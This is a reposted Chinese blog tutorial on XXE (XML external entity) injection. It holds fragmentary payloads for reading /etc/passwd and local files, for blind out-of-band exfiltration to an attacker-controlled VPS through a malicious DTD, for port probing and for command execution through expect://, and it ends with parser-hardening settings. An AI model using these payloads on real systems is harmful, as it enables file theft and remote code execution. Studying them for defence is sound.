Web漏洞|XXE漏洞详解(XML外部实体注入)
Posted 谢公子学安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Web漏洞|XXE漏洞详解(XML外部实体注入)相关的知识,希望对你有一定的参考价值。
目录
XXE
XXE漏洞演示利用(任意文件读取)
Blind OOB XXE
目录浏览和任意文件读取
端口扫描
远程代码执行
XXE漏洞的挖掘
XXE的防御
<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<a>&b;</a>
<a>&b;</a> #而http://mark4z5.com/evil.dtd内容为<!ENTITY b SYSTEM "file:///etc/passwd">
<a>%b;</a> #http://mark4z5.com/evil.dtd文件内容<!ENTITY b SYSTEM "file:///etc/passwd">
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/3a9a56b0d8a449afaebf249239661f61.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/99599442450f4accaf13e871636ca124.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/b81df1a8c2454c42968e1b211229a4cd.jpg)
-
OOB(Out-Of-Band):我们可以使用 Blind XXE 漏洞来构建一条外带数据OOB(Out-Of-Band)通道来读取数据。 -
错误获取数据:通过构造dtd然后从错误中获取数据
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://VPS的地址:2121/%file;'>">
%all;
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/754bb63689714369925ac2a54ef9e58a.jpg)
<!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">
<!ENTITY % file SYSTEM "file:///C:/Users/mi/Desktop/1.txt">
%remote;
%send;
]>
![6.png Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/125f4a956fe444f4a790de0b9cb2c567.jpg)
![7.png Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/ba5cab1fbc1e400ca6c96f7c20a9ca56.jpg)
<!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Users/mi/Desktop/1.txt">
%remote;
%send;
]>
![8.png Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/4db0a2a60f614183b24868ff040c5156.jpg)
![9.png Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/87a95ac41f074880b7b63f894d256fd4.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/cbb7b0133b0e4318b0d3d6facf5e6b1c.jpg)
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >
]>
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/2f1098612f6e4e44bab37857737a9509.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/072a755a82a4472a8d11bfd4ff60f5a8.jpg)
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
<core id="test101">
<author>John, Doe</author>
<title>I love XML</title>
<category>Computers</category>
<price>9.99</price>
<date>2018-10-01</date>
<description>&xxe;</description>
</core>
</catalog>
{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/970fd4f079484ed591a7fac7cda83543.jpg)
来源:谢公子的博客
责编:Zuo
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/cdfeeae0bd14419d837172432a0405bb.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/cdfeeae0bd14419d837172432a0405bb.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/dff228ae2f99430e80eec46c9aaacc95.jpg)
![Web漏洞|XXE漏洞详解(XML外部实体注入)](https://image.cha138.com/20210330/cc3af13faae3426c8ad98c17c62730f0.jpg)
以上是关于Web漏洞|XXE漏洞详解(XML外部实体注入)的主要内容,如果未能解决你的问题,请参考以下文章
09.27安全帮®每日资讯:思科互联网操作系统发现执行任意代码高危漏洞;WebSphere XML外部实体注入(XXE)漏洞